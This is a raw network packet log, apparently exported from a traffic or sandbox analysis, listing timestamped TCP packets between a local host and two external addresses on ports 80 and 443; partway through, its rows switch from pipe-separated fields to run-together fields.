                                                                                                          Nov 20, 2024 17:18:14.676814079 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.676917076 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.676959038 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.677015066 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.682090998 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.682121038 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.682173967 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.687443972 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.687467098 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.687519073 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.692358017 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.692377090 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.692454100 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.697554111 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.697593927 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.697627068 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.697654009 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.702666998 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.702706099 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.702735901 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.702797890 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.707845926 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.707864046 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.707916975 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.712985992 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.712999105 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.713046074 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.713072062 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.718019009 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.718033075 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.718097925 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.723079920 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.723150015 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.824011087 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.824032068 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.824084044 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.824117899 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.826072931 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.826141119 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.826222897 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.826297045 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.830235004 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.830250978 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.830305099 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.834639072 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.834656000 CET8049699192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.834716082 CET4969980192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.838623047 CET8049699192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.838641882 CET8049699192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.838733912 CET4969980192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.843244076 CET8049699192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.843260050 CET8049699192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.843323946 CET4969980192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.846807003 CET8049699192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.846865892 CET4969980192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.846931934 CET8049699192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.846982956 CET4969980192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.850716114 CET8049699192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.850734949 CET8049699192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.850795031 CET4969980192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.853221893 CET8049699192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.853276014 CET8049699192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.853281975 CET4969980192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.853322983 CET4969980192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.857064962 CET8049699192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.857131958 CET4969980192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.857148886 CET8049699192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.857198000 CET4969980192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.861188889 CET8049699192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.861248016 CET8049699192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.861257076 CET4969980192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.861295938 CET4969980192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.864773035 CET8049699192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.864837885 CET4969980192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.864877939 CET8049699192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.864928007 CET4969980192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.868541002 CET8049699192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.868674040 CET8049699192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.868690014 CET4969980192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.868717909 CET4969980192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.872318983 CET8049699192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.872390032 CET4969980192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.872421980 CET8049699192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.872462034 CET4969980192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.876219034 CET8049699192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.876301050 CET4969980192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.876419067 CET8049699192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.876544952 CET4969980192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.880002022 CET8049699192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.880064011 CET4969980192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.880108118 CET8049699192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.880175114 CET4969980192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.883857012 CET8049699192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.883930922 CET8049699192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.883929968 CET4969980192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.883975029 CET4969980192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.887646914 CET8049699192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.887728930 CET4969980192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.887794971 CET8049699192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.887845993 CET4969980192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.891412973 CET8049699192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.891521931 CET8049699192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.891550064 CET4969980192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.891582012 CET4969980192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.895205975 CET8049699192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.895256042 CET8049699192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.895294905 CET4969980192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.895332098 CET4969980192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.899030924 CET8049699192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.899087906 CET4969980192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.899115086 CET8049699192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.899331093 CET4969980192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.902916908 CET8049699192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.903212070 CET4969980192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:19.189191103 CET8049699192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:19.189271927 CET4969980192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:20.773794889 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:20.773829937 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:20.773931026 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:20.844932079 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:20.844958067 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:22.593180895 CET4969980192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:22.688019037 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:22.688147068 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:22.690665960 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:22.690675020 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:22.691168070 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:22.704199076 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:22.747354984 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:23.078716993 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:23.078748941 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:23.078840971 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:23.078918934 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:23.078978062 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:23.110938072 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:23.110949993 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:23.111032009 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:23.111074924 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:23.156392097 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:23.279520035 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:23.279532909 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:23.279614925 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:23.279654980 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:23.304234982 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:23.304357052 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:23.304375887 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:23.326719046 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:23.326730013 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:23.326816082 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:23.326834917 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:23.349435091 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:23.349445105 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:23.349579096 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:23.349598885 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:23.349653006 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:23.382589102 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:23.382600069 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:23.382684946 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:23.382720947 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:23.437643051 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:23.484046936 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:23.484059095 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:23.484095097 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:23.484137058 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:23.484193087 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:23.509527922 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:23.509543896 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:23.509566069 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:23.509620905 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:23.509681940 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:23.526721001 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:23.526735067 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:23.526762009 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:23.526791096 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:23.526829004 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:23.539172888 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:23.539181948 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:23.539241076 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:23.539253950 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:23.559123039 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:23.559158087 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:23.559192896 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:23.559211969 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:23.559237957 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:23.571501970 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:23.571542025 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:23.571578979 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:23.571594954 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:23.571624041 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:23.580571890 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:23.580626011 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:23.580670118 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:23.580691099 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:23.580722094 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:23.600872040 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:23.600956917 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:23.600960970 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:23.600982904 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:23.601017952 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:23.656384945 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:23.691987038 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:23.692001104 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:23.692028046 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:23.692069054 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:23.692118883 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:23.702851057 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.327368975 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:24.327382088 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.331010103 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.331089973 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:24.331104040 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.333719015 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.333794117 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:24.333800077 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.375133991 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:24.491465092 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.491477966 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.491555929 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:24.491584063 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.494452000 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.494527102 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:24.494535923 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.494548082 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.494590998 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:24.497668982 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.497679949 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.497769117 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:24.497777939 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.497831106 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:24.500480890 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.500565052 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:24.500574112 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.504008055 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.504115105 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:24.504122972 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.506764889 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.506843090 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:24.506850958 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.510051966 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.510126114 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:24.510133982 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.513170004 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.513247013 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:24.513256073 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.515980005 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.516083956 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:24.516093969 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.519220114 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.519292116 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:24.519299984 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.522537947 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.522636890 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:24.522644997 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.525662899 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.525759935 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:24.525768042 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.528543949 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.528672934 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:24.528687000 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.531297922 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.531400919 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:24.531409025 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.534923077 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.535003901 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:24.535011053 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.537434101 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.537514925 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:24.537523985 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.578252077 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:24.691339016 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.691366911 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.691437960 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:24.691463947 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.696785927 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.696856022 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.696868896 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:24.696892023 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.696923971 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:24.699522972 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.699615002 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:24.699630976 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.702505112 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.702588081 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:24.702604055 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.705790997 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.705887079 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:24.705897093 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.708595037 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.708669901 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:24.708678961 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.711237907 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.711335897 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:24.711345911 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.715126038 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.715212107 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:24.715220928 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.717894077 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.717972040 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:24.717982054 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.720959902 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.721033096 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:24.721041918 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.724689007 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.724786997 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:24.724798918 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.727560997 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.727626085 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:24.727637053 CET44349713142.215.209.78192.168.2.7
